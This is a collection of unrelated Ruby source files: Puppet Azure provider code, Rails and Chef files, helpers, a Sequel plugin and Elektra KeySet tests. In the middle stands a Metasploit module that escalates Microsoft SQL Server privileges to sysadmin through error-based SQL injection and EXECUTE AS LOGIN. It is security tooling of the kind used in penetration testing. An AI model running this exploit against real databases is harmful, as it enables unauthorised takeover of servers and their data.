end
def self.authenticate(path_params, query_params, header_params, body_params)
token = fetch_oauth2_token
if token
header_params["Authorization"] = "Bearer #{token}"
return true
else
return false
end
end
def self.fetch_oauth2_token
Puppet.info("Getting oauth2 token")
@client_id = ENV["azure_client_id"]
@client_secret = ENV["azure_client_secret"]
@tenant_id = ENV["azure_tenant_id"]
uri = URI("https://login.microsoftonline.com/#{@tenant_id}/oauth2/token")
response = Net::HTTP.post_form(uri,
"grant_type" => "client_credentials",
"client_id" => @client_id,
"client_secret" => @client_secret,
"resource" => "https://management.azure.com/")
Puppet.debug("get oauth2 token response code is #{response.code} and body is #{response.body}")
success = response.is_a? Net::HTTPSuccess
if success
return JSON[response.body]["access_token"]
else
raise Puppet::Error, "Unable to get oauth2 token - response is #{response} and body is #{response.body}"
end
end
def exists?
return_value = @property_hash[:ensure] && @property_hash[:ensure] != :absent
Puppet.info("Checking if resource #{name} of type <no value> exists, returning #{return_value}")
return_value
end
def self.add_keys_to_request(request, hash)
if hash
hash.each { |x, v| request[x] = v }
end
end
def self.to_query(hash)
if hash
return_value = hash.map { |x, v| "#{x}=#{v}" }.reduce { |x, v| "#{x}&#{v}" }
if !return_value.nil?
return return_value
end
end
return ""
end
def self.op_param(name, inquery, paramalias, namesnake)
operation_param = {:name => name, :inquery => inquery, :paramalias => paramalias, :namesnake => namesnake}
return operation_param
end
def self.call_op(path_params, query_params, header_params, body_params, parent_host, operation_path, operation_verb, parent_consumes)
uri_string = "https://#{parent_host}#{operation_path}" % path_params
uri_string = uri_string + "?" + to_query(query_params)
header_params["Content-Type"] = "application/json" # first of #{parent_consumes}
if authenticate(path_params, query_params, header_params, body_params)
Puppet.info("Authentication succeeded")
uri = URI(uri_string)
Net::HTTP.start(uri.host, uri.port, :use_ssl => uri.scheme == "https") do |http|
if operation_verb == "Get"
req = Net::HTTP::Get.new(uri)
elsif operation_verb == "Put"
req = Net::HTTP::Put.new(uri)
elsif operation_verb == "Delete"
req = Net::HTTP::Delete.new(uri)
end
add_keys_to_request(req, header_params)
if body_params
req.body = body_params.to_json
end
Puppet.debug("URI is (#{operation_verb}) #{uri}, body is #{body_params}, query params are #{query_params}, headers are #{header_params}")
response = http.request req # Net::HTTPResponse object
Puppet.debug("response code is #{response.code} and body is #{response.body}")
success = response.is_a? Net::HTTPSuccess
Puppet.info("Called (#{operation_verb}) endpoint at #{uri}, success was #{success}")
return response
end
end
end
end
# this is the end of the ruby class
| 43.04428 | 279 | 0.664681 |
28cf983cd265656fa2dab25b878cc7a34efa8872 | 1,209 | # frozen_string_literal: true
# Copyright 2015 Australian National Botanic Gardens
#
# This file is part of the NSL Editor.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
require "test_helper"
require "models/instance/as_typeahead/for_synonymy/test_helper.rb"
# Single instance typeahead search.
class ForNameAndReferenceYearTest < ActiveSupport::TestCase
  # A name combined with a reference year that does not match should
  # yield an empty typeahead result set.
  test "name and wrong year search" do
    typeahead = Instance::AsTypeahead::ForSynonymy.new("angophora costata 1789",
                                                       names(:a_species).id)
    assert_instance_of Array, typeahead.results, "Results should be an array."
    assert_empty typeahead.results, "Results should include no records."
  end
end
| 39 | 76 | 0.724566 |
4a5bf599fa4b7951dc3d9348b730a70776d60c95 | 266 | # Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
require '2016-03-01/generated/azure_mgmt_scheduler'
require 'profiles/latest/scheduler_latest_profile_client'
| 44.333333 | 94 | 0.823308 |
33d440043bd5aef9fca5d91eaae471f885801f8e | 424 | # frozen_string_literal: true
class CardSetsController < ApplicationController
  before_action :authenticate_user!

  # Lists card sets, optionally scoped to one of the current user's lists.
  def index
    @card_list = find_card_list
    @card_sets = find_card_sets
  end

  private

  # The current user's card list for params[:list_id].
  # Returns nil when no list is requested; raises ActiveRecord::RecordNotFound
  # when the slug does not belong to the current user (find_by!).
  def find_card_list
    list_slug = params[:list_id]
    return nil if list_slug.blank?

    CardList.find_by!(user_id: current_user.id, slug: list_slug)
  end

  # All card sets in display order.
  def find_card_sets
    @card_sets = CardSet.display_order
  end
end
| 18.434783 | 71 | 0.747642 |
f88d33c847805c283e54c36d0ddb9d59b54ab3d1 | 1,247 | class String
def clean
self.dup.clean!
end
def clean!
if self.match(/^\s+$/)
return nil
end
self.strip!
self.gsub!(/\s{2,}/, ' ')
self
end
def stub
I18n.transliterate(self).downcase.squish.gsub(/[^a-z\s]/, '').gsub(' ', '-')
end
end
# Format a Mexican phone-number digit string for display, grouping by length
# and area-code prefix. Pass sinLD=true to drop the long-distance "01 " prefix
# from the result. Raises RuntimeError for unsupported digit counts.
def formatoTelefono digitos, sinLD = false
  formatted = case digitos.length
  # NOTE(review): the second when-operand `digitos.match(/^044/)` compares a
  # MatchData (or nil) against the Integer length and can never match — only
  # the literal 13 is effective here. The 044-prefix handling actually happens
  # in the nested `if` below.
  when 13, digitos.match(/^044/)
    # 044 55 5555 5555 (mobile in CDMX/GDL/MTY area codes)
    if digitos.match(/^044(55|33|81)/)
      digitos.scan(/^(\d{3})(\d{2})(\d{4})(\d{4})$/)
    else
      # 044 777 777 777
      digitos.scan(/^(\d{3})(\d{3})(\d{3})(\d{3})$/)
    end
  when 12
    # 01 55 5555 5555 (long distance, 2-digit area code)
    if digitos.match(/^01(55|33|81)/)
      digitos.scan(/^(\d{2})(\d{2})(\d{4})(\d{4})$/)
    else
      # 01 777 777 7777 (long distance, 3-digit area code)
      digitos.scan(/^(\d{2})(\d{3})(\d{3})(\d{4})$/)
    end
  # 777 777 7777
  when 10 then digitos.scan(/^(\d{3})(\d{3})(\d{4})$/)
  # 5555 5555
  when 8 then digitos.scan(/^(\d{4})(\d{4})$/)
  # 777 7777
  when 7 then digitos.scan(/^(\d{3})(\d{4})$/)
  else
    raise "No se que hacer con #{digitos.length} dígitos <#{digitos.match(/^044/)}>"
  end.flatten.join(' ')
  formatted = formatted.gsub(/^01\s?/, '') if sinLD
  formatted
end | 23.980769 | 86 | 0.513232 |
e2f781eb4f3cb48deb857dcd0f4e5d88da23e0d7 | 6,266 | ##
# This module requires Metasploit: http//metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
require 'msf/core/exploit/mssql_commands'
# Privilege escalation through error-based SQL injection against MSSQL,
# abusing the IMPERSONATE permission (EXECUTE AS LOGIN) to reach sysadmin.
class Metasploit3 < Msf::Auxiliary
  include Msf::Exploit::Remote::MSSQL_SQLI
  include Msf::Auxiliary::Report

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'Microsoft SQL Server - SQLi Escalate Execute As',
      'Description'    => %q{
        This module can be used escalate privileges if the IMPERSONATION privilege has been
        assigned to the user via error based SQL injection. In most cases, this results in
        additional data access, but in some cases it can be used to gain sysadmin privileges.
        The syntax for injection URLs is: /testing.asp?id=1+and+1=[SQLi];--
      },
      'Author'         => ['nullbind <scott.sutherland[at]netspi.com>'],
      'License'        => MSF_LICENSE,
      'References'     => [['URL','http://msdn.microsoft.com/en-us/library/ms178640.aspx']]
    ))
  end

  # Main flow: identify the current login, bail if already sysadmin,
  # enumerate impersonable logins, pick a sysadmin among them and escalate.
  def run
    # Get the database user name
    print_status("#{peer} - Grabbing the database user name...")
    db_user = get_username
    if db_user.nil?
      print_error("#{peer} - Unable to grab user name...")
      return
    else
      print_good("#{peer} - Database user: #{db_user}")
    end

    # Grab sysadmin status
    print_status("#{peer} - Checking if #{db_user} is already a sysadmin...")
    admin_status = check_sysadmin
    if admin_status.nil?
      print_error("#{peer} - Couldn't retrieve user status, aborting...")
      return
    elsif admin_status == '1'
      print_error("#{peer} - #{db_user} is already a sysadmin, no escalation needed.")
      return
    else
      print_status("#{peer} - #{db_user} is NOT a sysadmin, let's try to escalate privileges.")
    end

    # Get list of users that can be impersonated
    print_status("#{peer} - Enumerating a list of users that can be impersonated...")
    imp_user_list = check_imp_users
    if imp_user_list.nil? || imp_user_list.empty?
      print_error("#{peer} - Sorry, the current user doesnt have permissions to impersonate anyone.")
      return
    else
      # Display list of users that can be impersonated
      print_good("#{peer} - #{imp_user_list.length} users can be impersonated:")
      imp_user_list.each do |dbuser|
        print_status("#{peer} - #{dbuser}")
      end
    end

    # Check if any of the users that can be impersonated are sysadmins
    print_status("#{peer} - Checking if any of them are sysadmins...")
    imp_user_sysadmin = check_imp_sysadmin(imp_user_list)
    if imp_user_sysadmin.nil?
      print_error("#{peer} - Sorry, none of the users that can be impersonated are sysadmins.")
      return
    end

    # Attempt to escalate to sysadmin
    print_status("#{peer} - Attempting to impersonate #{imp_user_sysadmin}...")
    escalate_privs(imp_user_sysadmin, db_user)

    admin_status = check_sysadmin
    if admin_status && admin_status == '1'
      print_good("#{peer} - Success! #{db_user} is now a sysadmin!")
    else
      print_error("#{peer} - Fail buckets, something went wrong.")
    end
  end

  # Extract SYSTEM_USER via the injection, bracketed by random marker strings
  # so the value can be parsed out of the error/response body.
  # Returns the login name or nil.
  def get_username
    # Setup query to check for database username
    clue_start = Rex::Text.rand_text_alpha(8 + rand(4))
    clue_end = Rex::Text.rand_text_alpha(8 + rand(4))
    sql = "(select '#{clue_start}'+SYSTEM_USER+'#{clue_end}')"

    # Run query
    result = mssql_query(sql)

    # Parse result
    if result && result.body && result.body =~ /#{clue_start}([^>]*)#{clue_end}/
      user_name = $1
    else
      user_name = nil
    end
    user_name
  end

  # Whether the current login is in the sysadmin server role.
  # Returns '1', '0' or nil when the value could not be parsed.
  def check_sysadmin
    # Setup query to check for sysadmin
    clue_start = Rex::Text.rand_text_alpha(8 + rand(4))
    clue_end = Rex::Text.rand_text_alpha(8 + rand(4))
    sql = "(select '#{clue_start}'+cast((select is_srvrolemember('sysadmin'))as varchar)+'#{clue_end}')"

    # Run query
    result = mssql_query(sql)

    # Parse result
    if result && result.body && result.body =~ /#{clue_start}([^>]*)#{clue_end}/
      status = $1
    else
      status = nil
    end
    status
  end

  # Enumerate logins the current user may impersonate (IMPERSONATE grants).
  # Returns a unique array of login names, or nil when nothing was returned.
  def check_imp_users
    # Setup query to check for trusted databases owned by sysadmins
    clue_start = Rex::Text.rand_text_alpha(8 + rand(4))
    clue_end = Rex::Text.rand_text_alpha(8 + rand(4))

    # Setup query
    sql = "(select cast((SELECT DISTINCT '#{clue_start}'+b.name+'#{clue_end}'
    FROM sys.server_permissions a
    INNER JOIN sys.server_principals b
    ON a.grantor_principal_id = b.principal_id
    WHERE a.permission_name = 'IMPERSONATE' for xml path('')) as int))"

    # Run query
    res = mssql_query(sql)

    unless res && res.body
      return nil
    end

    # Parse results
    parsed_result = res.body.scan(/#{clue_start}(.*?)#{clue_end}/m)

    if parsed_result && !parsed_result.empty?
      parsed_result.flatten!
      parsed_result.uniq!
    end
    parsed_result
  end

  # Probe each impersonable login for sysadmin membership.
  # Returns the first sysadmin login found, or nil.
  def check_imp_sysadmin(imp_user_list)
    # Check if the user has the db_owner role is any databases
    imp_user_list.each do |imp_user|
      # Setup query
      clue_start = Rex::Text.rand_text_alpha(8 + rand(4))
      clue_end = Rex::Text.rand_text_alpha(8 + rand(4))
      sql = "(select '#{clue_start}'+cast((select is_srvrolemember('sysadmin','#{imp_user}'))as varchar)+'#{clue_end}')"

      # Run query
      result = mssql_query(sql)

      unless result && result.body
        next
      end

      # Parse results
      parsed_result = result.body.scan(/#{clue_start}(.*?)#{clue_end}/m)

      if parsed_result && !parsed_result.empty?
        parsed_result.flatten!
        parsed_result.uniq!
      end

      # check if user is a sysadmin
      if parsed_result && parsed_result[0] == '1'
        print_good("#{peer} - #{imp_user} is a sysadmin!")
        return imp_user
      else
        print_status("#{peer} - #{imp_user} is NOT a sysadmin")
      end
    end
    nil
  end

  # Impersonate the discovered sysadmin login and add the current login to
  # the sysadmin server role.
  # FIX: the original hardcoded 'sa' and 'MyUser1' and ignored both
  # parameters, so the escalation only ever worked by accident; interpolate
  # the discovered sysadmin login and the current database user instead.
  def escalate_privs(imp_user, db_user)
    # Setup Query - Impersonate the first sysadmin user on the list
    evil_sql = "1;EXECUTE AS LOGIN = '#{imp_user}';EXEC sp_addsrvrolemember '#{db_user}','sysadmin';Revert;--"

    # Execute Query
    mssql_query(evil_sql)
  end
end
| 31.019802 | 120 | 0.649697 |
08c6971630ad54665c7379b23ff973b36fd88dcc | 310 | name 'hadoop_slave_conf_setup'
# Chef cookbook metadata for hadoop_slave_conf_setup.
# NOTE(review): maintainer/maintainer_email are generator placeholders —
# fill in real values before publishing.
maintainer 'YOUR_COMPANY_NAME'
maintainer_email 'YOUR_EMAIL'
license 'All rights reserved'
description 'Installs/Configures hadoop_slave_conf_setup'
long_description IO.read(File.join(File.dirname(__FILE__), 'README.md'))
version '0.1.0'
| 38.75 | 72 | 0.719355 |
018447934ab4848b2e948ffbceedd50500fd3d0c | 2,604 | class OpenProject::XlsExport::XlsViews::CostEntryTable < OpenProject::XlsExport::XlsViews
def generate
@spreadsheet = OpenProject::XlsExport::SpreadsheetBuilder.new(I18n.t(:label_money))
default_query = serialize_query_without_hidden(@query)
available_cost_type_tabs(options[:cost_types]).each_with_index do |(unit_id, name), idx|
setup_query_for_tab(default_query, unit_id)
spreadsheet.worksheet(idx, name)
build_spreadsheet
end
spreadsheet
end
def setup_query_for_tab(query, unit_id)
@query = CostQuery.deserialize(query)
@cost_type = nil
@unit_id = unit_id
if @unit_id != 0
@query.filter :cost_type_id, operator: '=', value: @unit_id.to_s
@cost_type = CostType.find(unit_id) if unit_id.positive?
end
end
def build_spreadsheet
set_title
build_header
format_columns
build_cost_rows
build_footer
spreadsheet
end
def build_header
spreadsheet.add_headers(headers)
end
def build_cost_rows
query.each_direct_result do |result|
spreadsheet.add_row(cost_row(result))
end
end
def format_columns
spreadsheet.add_format_option_to_column(headers.length - 3,
number_format: number_format)
spreadsheet.add_format_option_to_column(headers.length - 1,
number_format: currency_format)
end
def cost_row(result)
current_cost_type_id = result.fields['cost_type_id'].to_i
cost_entry_attributes
.map { |field| show_field field, result.fields[field.to_s] }
.concat(
[
show_result(result, current_cost_type_id), # units
cost_type_label(current_cost_type_id, @cost_type), # cost type
show_result(result, 0) # costs/currency
]
)
end
def build_footer
footer = [''] * cost_entry_attributes.size
footer += if show_result(query, 0) != show_result(query)
one_unit_type_footer
else
multiple_unit_types_footer
end
spreadsheet.add_sums(footer) # footer
end
def one_unit_type_footer
[show_result(query), '', show_result(query, 0)]
end
def multiple_unit_types_footer
['', '', show_result(query)]
end
def headers
cost_entry_attributes
.map { |field| label_for(field) }
.concat([CostEntry.human_attribute_name(:units), CostType.model_name.human, CostEntry.human_attribute_name(:costs)])
end
def cost_entry_attributes
%i[spent_on user_id activity_id work_package_id comments project_id]
end
end
| 26.845361 | 122 | 0.678955 |
bb550e11b2fbb8755c420ae7597b0df3444c6017 | 632 | atom_feed do |feed|
feed.title("Clipster - Recent")
feed.updated(@updated_at) unless @updated_at.nil?
@clips.each do |clip|
feed.entry(clip) do |entry|
if clip.expires.nil?
entry.title("#{clip.title}. A #{clip.language} clip that never expires.")
else
entry.title("#{clip.title}. A #{clip.language} clip that expires on #{clip.expires}.")
end
entry.content('<div class="clip">' + clip.div.html_safe + '</div>', :type => 'html')
#TODO set author once user integration is compleate
#entry.author do |author|
# author.name("DHH")
#end
end
end
end | 31.6 | 94 | 0.610759 |
bba1a7d2f362e177b7c2cb5066a6bf0c0d579a72 | 894 | # frozen_string_literal: true
require_relative './_common'
# Declarative management of global git configuration: diff the desired config
# against the current one and apply only the missing entries.
module GitConfigModule
  include CommonModule

  # Compare the desired nested config_hash against `git config --global -l`
  # and queue a [:git_config, missing] plan step when anything differs.
  def evaluate(config_hash)
    with_plan do |plan|
      missing = []
      # Kernel.send('`', ...) shells out — equivalent to backticks.
      current_config = Kernel.send('`', 'git config --global -l').strip.split("\n").map { |l| l.split('=', 2) }.to_h
      flat_hash(config_hash).each do |k, v|
        # Dotted, lowercased key as git prints it, e.g. "user.name".
        key = k.map(&:to_s).join('.').downcase
        missing << [key, v.to_s] if current_config[key] != v.to_s
      end
      plan << [:git_config, missing] unless missing.empty?
    end
  end

  # Apply queued [key, value] pairs via `git config --global`.
  def run(values)
    values.each do |key, value|
      sh "git config --global #{key} #{value.to_s.inspect}"
    end
  end

  private

  # Flatten a nested hash into { [key path array] => leaf value } pairs.
  def flat_hash(hash, k = [])
    return { k => hash } unless hash.is_a?(Hash)

    hash.inject({}) { |h, v| h.merge! flat_hash(v[-1], k + [v[0]]) }
  end
end

ModuleRegistry.register_module :git_config, GitConfigModule
| 24.162162 | 116 | 0.620805 |
0342515bdb3d02ed5abc02b0b3addc91af40a21f | 411 | require "archived_concern"
# Inventory record for a service, scoped to a tenant and a source, with
# soft-archival behavior mixed in via ArchivedConcern.
class ServiceInventory < ApplicationRecord
  include ArchivedConcern

  belongs_to :tenant
  belongs_to :source
  # Optional link to the refresh-state part that produced this record.
  belongs_to :refresh_state_part, :optional => true

  has_many :service_instances
  has_many :service_instance_nodes
  has_many :service_inventory_tags
  has_many :service_offerings
  has_many :service_offering_nodes

  acts_as_tenant(:tenant)

  acts_as_taggable_on
end
| 21.631579 | 51 | 0.819951 |
5d232756fe3481e5297cd8ee6dc23121585cc51e | 318 | # frozen_string_literal: true
module RailsBand
  module ActionController
    module Event
      # A wrapper for the event that is passed to `exist_fragment?.action_controller`.
      class ExistFragment < BaseEvent
        # Cache key of the fragment being checked; memoized from the event
        # payload. Raises KeyError when the payload has no :key entry.
        def key
          @key ||= @event.payload.fetch(:key)
        end
      end
    end
  end
end
| 21.2 | 86 | 0.654088 |
1af348336ee3fbf1a05a051f111f68db011d5456 | 912 | require 'sql/force_index_expression'
module Sequel
module Plugins
module ForceIndex
module DatasetMethods
def select_sql()
puts @opts.inspect
puts "is it working #{@opts[:from]}"
result = super
puts result
#raise Exception.new('ad')
result
end
def join_table(type, table, expr=nil, opts=OPTS, &block)
puts "joins .... "
puts table
puts opts.inspect
puts "---"
super type, table, expr, opts, &block
end
def force_index(index)
# ADD USE INDEX ( ' .... ')
puts "force --- "
puts @opts[:from].last
idx = @opts[:from].length - 1
@opts[:from][idx] = ::SQL::ForceIndexExpression.new(@opts[:from].last, index).to_s
self
end
end
end
end
end | 26.057143 | 94 | 0.495614 |
4acab5cd2277cd37f1f8838bee5a3ba7e0006899 | 389 | # frozen_string_literal: true
module Types
  # GraphQL enum of the sort orders accepted by roadmap/epic queries.
  class EpicSortEnum < BaseEnum
    graphql_name 'EpicSort'
    description 'Roadmap sort values'

    value 'start_date_desc', 'Start date at descending order'
    value 'start_date_asc', 'Start date at ascending order'
    value 'end_date_desc', 'End date at descending order'
    value 'end_date_asc', 'End date at ascending order'
  end
end
| 27.785714 | 61 | 0.737789 |
ff8cfad431b4ffd20cc02c2cdf77d9e1bfe134cc | 17,029 | #!/usr/bin/env ruby
##
# @file
#
# @brief unit test cases for Kdb::KeySet
#
# @copyright BSD License (see doc/LICENSE.md or http://www.libelektra.org)
#
require 'kdb'
require 'test/unit'
require_relative 'test_helper'
class KdbKeySetTestCases < Test::Unit::TestCase
def test_keySet_new_simple
assert_nothing_raised do
ks = Kdb::KeySet.new
assert_not_nil ks
assert_instance_of Kdb::KeySet, ks
assert_equal 0, ks.size
end
end
def test_keySet_new_with_key
assert_nothing_raised do
k = Kdb::Key.new "user/key", value: "hello"
ks = Kdb::KeySet.new k
assert_equal 1, ks.size
assert_equal k, ks.head
end
end
def test_keySet_new_with_invalid_argument
assert_raise ArgumentError do
Kdb::KeySet.new "not a key"
end
end
def test_keySet_new_with_keySet
assert_nothing_raised do
ks1 = Kdb::KeySet.new
ks1 << Kdb::Key.new("user/ks1")
ks1 << Kdb::Key.new("user/ks2")
ks2 = Kdb::KeySet.new ks1
assert_equal 2, ks2.size
ks2 << Kdb::Key.new("user/ks3")
assert_equal 3, ks2.size
assert_equal "user/ks3", ks2.tail.name
# ensure old KeySet holds only the first 2 Keys
assert_equal 2, ks1.size
assert_equal "user/ks2", ks1.tail.name
end
end
def test_keySet_new_with_array
assert_nothing_raised do
a = Array.new
a << Kdb::Key.new("user/ks1")
a << Kdb::Key.new("user/ks2")
a << Kdb::Key.new("user/ks3")
a << Kdb::Key.new("user/ks4")
ks = Kdb::KeySet.new a
assert_equal 4, ks.size
i = 0
ks.each { |e|
assert_equal a[i], e
i += 1
}
ks = Kdb::KeySet.new [
Kdb::Key.new("user/key1"),
Kdb::Key.new("user/key2"),
Kdb::Key.new("user/key3")
]
assert_equal 3, ks.size
assert_equal "key1", ks.head.basename
# ensure also larger arrays, with more than 16 (preallocated) elements
# work correctly
a = (1..40).map { |n| Kdb::Key.new("user/key%02d" % n) }
ks = Kdb::KeySet.new a
assert_equal 40, ks.size
assert_equal "key40", ks.tail.basename
end
assert_raise ArgumentError do
Kdb::KeySet.new [
Kdb::Key.new("user/key"),
"not a key",
1
]
end
end
def test_keySet_append
assert_nothing_raised do
k = Kdb::Key.new "user/ks1", value: "val", meta: "metaval"
ks = Kdb::KeySet.new
num = ks.append k
assert_equal 1, ks.size
assert_equal 1, num
assert_equal k, ks.head
assert_equal k, ks.tail
ks << Kdb::Key.new("user/ks2", value: "val2")
assert_equal 2, ks.size
assert_equal k, ks.head
assert_equal "user/ks2", ks.tail.name
end
end
def test_keySet_append_KeySet
assert_nothing_raised do
ks1 = Kdb::KeySet.new
num = ks1 << Kdb::Key.new("user/ks1")
assert_equal 1, num
num = ks1 << Kdb::Key.new("user/ks2")
assert_equal 2, num
ks2 = Kdb::KeySet.new
num = ks2 << Kdb::Key.new("user/ks3")
assert_equal 1, num
num = ks2 << Kdb::Key.new("user/ks4")
assert_equal 2, num
num = ks1 << ks2
assert_equal 4, num
assert_equal 4, ks1.size
assert_equal 2, ks2.size
end
end
def test_keySet_append_array
assert_nothing_raised do
a = Array.new
a << Kdb::Key.new("user/ks2")
a << Kdb::Key.new("user/ks1")
ks = Kdb::KeySet.new
num = ks.append a
assert_equal 2, num
assert_equal 2, ks.size
assert_equal a[0], ks[1]
assert_equal a[1], ks[0]
end
assert_nothing_raised do
ks = Kdb::KeySet.new
num = ks << [
Kdb::Key.new("user/ks1"),
Kdb::Key.new("user/ks2"),
Kdb::Key.new("user/ks3")
]
assert_equal 3, num
assert_equal 3, ks.size
assert_equal "user/ks1", ks.head.name
end
a = Array.new
a << "not a Key"
a << 1
ks = Kdb::KeySet.new
assert_raise ArgumentError do
ks.append a
end
end
def test_keySet_append_invalid_type
assert_raise ArgumentError do
ks = Kdb::KeySet.new
ks.append "not a Key"
end
end
def test_keySet_get_by_cursor_or_index
assert_nothing_raised do
ks = Kdb::KeySet.new (0..9).map { |i| Kdb::Key.new "user/key%02d" % i }
assert_equal 10, ks.size
# test get by index
for i in (0..9) do
assert_equal ("user/key%02d" % i), ks.at(i).name
assert_equal ("user/key%02d" % i), ks[i].name
end
# test get by cursor
ks.rewind
assert ks.cursor < 0
assert_nil ks.current
for i in (0..9) do
nxt = ks.next
cur = ks.current
assert_equal ("user/key%02d" % i), nxt.name
assert_equal cur, nxt
assert_equal i, ks.cursor
end
assert_nil ks.next
assert_nil ks.current
assert ks.cursor < 0
# test get by invalid index
assert_nil ks[10]
assert_nil ks[-11]
assert_nil ks.at(200)
end
end
def test_keySet_pop
assert_nothing_raised do
ks = Kdb::KeySet.new
assert_nil ks.pop
k = Kdb::Key.new("user/k0")
ks << k
assert_equal 1, ks.size
assert_equal k, ks.pop
assert_equal 0, ks.size
k = Kdb::Key.new("user/k1")
ks << k
assert_equal 1, ks.size
assert_equal k, ks.pop
assert_equal 0, ks.size
k2 = Kdb::Key.new("user/k2")
k3 = Kdb::Key.new("user/k3")
k4 = Kdb::Key.new("user/k4")
k5 = Kdb::Key.new("user/k5")
ks << [k2, k3, k4, k5]
assert_equal 4, ks.size
assert_equal k5, ks.pop
assert_equal k4, ks.pop
assert_equal k3, ks.pop
assert_equal k2, ks.pop
assert_equal 0, ks.size
assert_nil ks.pop
end
end
def test_keySet_head_tail
assert_nothing_raised do
ks = Kdb::KeySet.new
assert_equal 0, ks.size
assert_nil ks.head
assert_nil ks.tail
a = (0..3).map { |i| Kdb::Key.new "user/key#{i}" }
ks << a[0]
assert_equal a[0], ks.head
assert_equal a[0], ks.tail
ks << a[1]
assert_equal a[0], ks.head
assert_equal a[1], ks.tail
ks << a[2]
assert_equal a[0], ks.head
assert_equal a[2], ks.tail
ks << a[3]
assert_equal a[0], ks.head
assert_equal a[3], ks.tail
assert_equal a[3], ks.pop
assert_equal a[2], ks.tail
assert_equal a[2], ks.pop
assert_equal a[1], ks.tail
assert_equal a[1], ks.pop
assert_equal a[0], ks.tail
assert_equal a[0], ks.pop
assert_nil ks.tail
end
end
def test_keySet_each_enumeralbe
assert_nothing_raised do
a = Array.new
# create test keys
a << Kdb::Key.new("user/k0", value: "v0", owner: "me")
a << Kdb::Key.new("user/k1", value: "v1", owner: "you")
a << Kdb::Key.new("user/k2", value: "v2", owner: "john", m2: "a")
a << Kdb::Key.new("user/k3", value: "v3", owner: "jane")
a << Kdb::Key.new("user/k4", value: "v4", owner: "max")
a << Kdb::Key.new("user/k5", value: "v5", owner: "bob", m2: "b")
a << Kdb::Key.new("user/k6", value: "v6", owner: "alice")
a << Kdb::Key.new("user/k7", value: "v7", owner: "fritz", m3: "c")
a << Kdb::Key.new("user/k8", value: "v8", owner: "anton")
a << Kdb::Key.new("user/k9", value: "v9", owner: "berta")
ks = Kdb::KeySet.new
# populate keySet
a.each { |e| ks << e }
assert_equal 10, ks.size
# this will only work, if test keys have key names in desc order
i = 0
ks.each do |e|
assert a[i] == e
i += 1
end
assert_equal 10, i
# test Enumerable mixin
assert ks.all? { |e| e.namespace == "user" }
assert ks.all? { |e| e.has_meta? "owner" }
assert ks.all? { |e| e.is_string? }
assert ! ks.all? { |e| e.value == "v0" }
assert ks.any? { |e| e.value == "v0" }
k = ks.find { |e| e.name == "user/k5" }
assert_instance_of Kdb::Key, k
assert k.is_valid?
assert ! k.is_null?
assert_equal "user/k5", k.name
assert a[5] == k
k = ks.find { |e| e.name == "does_not_exist" }
assert_nil k
assert_equal 2, ks.count { |e| e.has_meta? "m2" }
tmpa = ks.find_all { |e| e.has_meta? "m2" }
assert_instance_of Array, tmpa
assert_equal 2, tmpa.size
assert_equal a[2], tmpa[0]
assert_equal a[5], tmpa[1]
# test Enumerable #min, #max
assert_equal a[9], ks.max
assert_equal a[0], ks.min
# owner: you is maximum
assert_equal a[1], ks.max_by { |e| e["owner"] }
# our each impl makes inplace modifications
ks.each { |e| e["new_meta"] = "persisted" }
assert ks.all? { |e| e.has_meta? "new_meta" }
assert ks.all? { |e| e["new_meta"] == "persisted" }
# ensure KeySet cursor is unmodified after 'each' call
ks.rewind
assert_equal (-1), ks.cursor
ks.each { |e| e }
assert_equal (-1), ks.cursor
ks.next
assert_equal 0, ks.cursor
ks.next
assert_equal 1, ks.cursor
ks.each { |e| e }
assert_equal 1, ks.cursor
ks.cursor = 5
assert_equal 5, ks.cursor
ks.each { |e| e }
assert_equal 5, ks.cursor
end
end
def test_keySet_comparison
assert_nothing_raised do
a = (1..5).map { |i| Kdb::Key.new "user/key#{i}" }
ks1 = Kdb::KeySet.new a
ks2 = Kdb::KeySet.new a
assert_equal ks1.size, ks2.size
assert_equal ks1[0], ks2[0]
assert_equal ks1[1], ks2[1]
assert_equal ks1[2], ks2[2]
assert_equal ks1[3], ks2[3]
assert_equal ks1[4], ks2[4]
assert ks1 == ks2
assert ! ks1 != ks2
assert ks1.eql?(ks2)
assert ks2.eql?(ks1)
ks2 << Kdb::Key.new("user/key100")
assert ks1 != ks2
assert ! ks1.eql?(ks2)
assert ! ks2.eql?(ks1)
end
end
def test_keySet_lookup_lookupByName
assert_nothing_raised do
ks = Kdb::KeySet.new (1..10).map { |i| Kdb::Key.new("user/key%02d" % i) }
assert_equal 10, ks.size
# lookupByName
assert_equal "user/key01", ks.lookup("user/key01").name
assert_equal Kdb::Key.new("user/key02"), ks.lookup("user/key02")
# lookup
assert_equal "user/key03", ks.lookup(Kdb::Key.new "user/key03").name
# lookup unknown key
assert_nil ks.lookup("user/key_now_in_keyset")
assert_nil ks.lookup(Kdb::Key.new "user/key_now_in_keyset")
# with options
lookupkey = Kdb::Key.new "user/key05"
assert_equal lookupkey, ks.lookup(lookupkey, Kdb::KDB_O_POP)
assert_equal 9, ks.size
assert_nil ks.lookup(lookupkey)
end
end
def test_keySet_dup_or_clone
assert_nothing_raised do
a = (0..4).map { |i| Kdb::Key.new "user/key#{i}" }
ks = Kdb::KeySet.new a
assert_equal 5, ks.size
ks_dup = ks.dup
assert_equal ks.size, ks_dup.size
assert ks == ks_dup
assert ks.__id__ != ks_dup.__id__
ks_dup << Kdb::Key.new("user/key5")
assert_equal 5, ks.size
assert_equal 6, ks_dup.size
assert_equal "user/key4", ks.tail.name
assert_equal "user/key5", ks_dup.tail.name
assert_equal a[4], ks.pop
assert_equal 4, ks.size
assert_equal 6, ks_dup.size
assert_equal "user/key3", ks.tail.name
assert_equal "user/key5", ks_dup.tail.name
# however, its just a shallow copy, thus modifying keys has effect
# to both key sets
assert_equal "", ks[1].value
assert_equal "", ks_dup[1].value
new_value = "some important value"
ks[1].value = new_value
assert_equal new_value, ks[1].value
assert_equal new_value, ks_dup[1].value
end
end
def test_keySet_cut
assert_nothing_raised do
ks = Kdb::KeySet.new [
Kdb::Key.new("user/app1/setting1"),
